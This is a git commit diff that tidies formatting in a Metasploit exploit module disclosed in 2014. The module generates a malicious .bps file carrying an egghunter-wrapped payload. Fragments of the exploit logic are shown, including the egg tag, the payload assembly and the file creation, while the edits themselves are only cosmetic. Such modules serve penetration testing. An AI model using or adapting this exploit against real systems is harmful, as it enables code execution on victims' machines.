Clean up some stuff
parent
9f97b55a4b
commit
482cfb8d59
|
@ -57,22 +57,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Jul 24 2014',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.bps'])
|
||||
],
|
||||
self.class)
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.bps'])
|
||||
],
|
||||
self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
eggoptions =
|
||||
{
|
||||
eggoptions = {
|
||||
:checksum => true,
|
||||
:eggtag => "w00t"
|
||||
:eggtag => 'w00t'
|
||||
}
|
||||
|
||||
hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
|
||||
|
@ -86,8 +84,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sploit << rand_text_alpha(8) + "\r\n" # Login password
|
||||
|
||||
# Create the file
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
print_status("Creating '#{datastore['FILENAME']}' file...")
|
||||
file_create(sploit)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue